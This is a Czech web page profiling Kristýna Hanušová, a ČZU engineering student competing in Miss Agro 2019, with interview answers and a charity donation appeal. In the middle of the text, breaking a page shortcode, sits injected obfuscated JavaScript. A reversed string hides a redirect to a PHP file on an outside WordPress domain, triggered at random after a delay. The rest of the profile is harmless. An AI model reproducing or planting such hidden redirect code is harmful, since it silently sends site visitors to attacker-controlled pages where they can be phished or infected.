Kristýna Hanušová

Profil

Fakulta: TF
Obor: Obchod a podnikání s technikou (OPTN)
Ročník: 4.
Věk:
25

Byla, nebyla jedna dívka, která už od malinka milovala tanec a umění. Nebála se žádné výzvy, a proto se stala úspěšnou poledance tanečnicí, kapitánkou malého plavidla, nebo začala studovat techniku na ČZU. Životní sen této dívky je žít svůj život naplno, ať už jako lektorka poledance, nebo jako špičková kombajnérka.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Proč? Protože chci reprezentovat svou fakultu. Ráda bych všem ukázala, že na technice nejsou jenom „pojídači párků v rohlíku, ale i fajn lidi, kvůli kterým stojí za to tuhle fakultu studovat. Ráda bych inspirovala ostatní holky k tomu, že se nemusí bát techniky, není to fakulta jenom pro kluky.

Máš nějaký životní vzor? Čím Tě inspiruje?

Já nemám žádný životní vzor, žiji podle svého nejlepšího vědomí a svědomí. Můj život, můj scénář.

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Nejvíce vzpomínám na předmět, který považuji asi za nejtěžší z celého studia. Jednalo se o Základy strojnictví s panem inženýrem Sedláčkem. Stěžejní byla znalost hlavně statiky, mechaniky, hodně matematiky a logiky.

Na co se v soutěži Miss Agro těšíš nejvíc?

Davy fanoušků!…. Ne, fanoušků už mám dost na technický. Na škole plné kluků to jinak nejde. Těším se ale hlavně na skvělou příležitost ukázat co umím.